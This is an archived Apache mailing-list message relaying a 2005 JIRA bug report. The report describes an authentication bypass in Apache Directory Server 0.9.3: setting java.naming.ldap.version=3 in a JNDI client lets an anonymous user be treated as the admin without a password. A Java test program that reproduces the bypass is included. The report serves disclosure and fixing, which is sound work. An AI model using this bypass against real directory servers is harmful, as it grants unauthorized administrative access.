directory-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Endi S. Dewata (JIRA)" <directory-...@incubator.apache.org>
Subject [jira] Created: (DIREVE-239) Anonymous user may gain access as admin user
Date Wed, 31 Aug 2005 00:45:04 GMT
Anonymous user may gain access as admin user
--------------------------------------------

         Key: DIREVE-239
         URL: http://issues.apache.org/jira/browse/DIREVE-239
     Project: Directory Server
        Type: Bug
    Versions: 0.9.3    
 Reporter: Endi S. Dewata
 Assigned to: Alex Karasulu 


Anonymous user may gain access as admin user by specifying java.naming.ldap.version=3 in the
JNDI client.

To show the problem, add a print statement in the AuthenticationService.java at line 369:

                // perform the authentication
                LdapPrincipal authorizationId = authenticator.authenticate( ctx );
                System.out.println("Authorization ID: "+authorizationId);

Start the server, then run the following program:

import junit.framework.TestCase;
import javax.naming.Context;
import javax.naming.NamingEnumeration;
import javax.naming.directory.*;
import java.util.Hashtable;

public class Test extends TestCase {

    public void testAnonymousBindWithLDAPVersion3() throws Exception {

        String suffix = "dc=apache,dc=org";

        Hashtable env = new Hashtable();
        env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.ldap.LdapCtxFactory");
        env.put(Context.PROVIDER_URL, "ldap://localhost:10389/");
        // env.put("java.naming.ldap.version", "3");

        DirContext ctx = new InitialDirContext(env);

        SearchControls sc = new SearchControls();
        sc.setSearchScope(SearchControls.SUBTREE_SCOPE);

        NamingEnumeration ne = ctx.search(suffix, "(objectClass=*)", sc);

        System.out.println("Search results:");

        int counter = 0;
        while (ne.hasMore()) {
            SearchResult sr = (SearchResult)ne.next();
            String rdn = sr.getName();
            System.out.println(" - "+("".equals(rdn) ? suffix : rdn+","+suffix));
            counter++;
        }

        System.out.println("Found "+counter+" entries.");

        ctx.close();
    }
}

Without specifying java.naming.ldap.version=3, the user will remain anonymous (empty Authentication
ID). However, with java.naming.ldap.version=3, the anonymous user gets authenticated as the
admin user without even specifying any password.


-- 
This message is automatically generated by JIRA.
-
If you think it was sent incorrectly contact one of the administrators:
   http://issues.apache.org/jira/secure/Administrators.jspa
-
For more information on JIRA, see:
   http://www.atlassian.com/software/jira


Mime
View raw message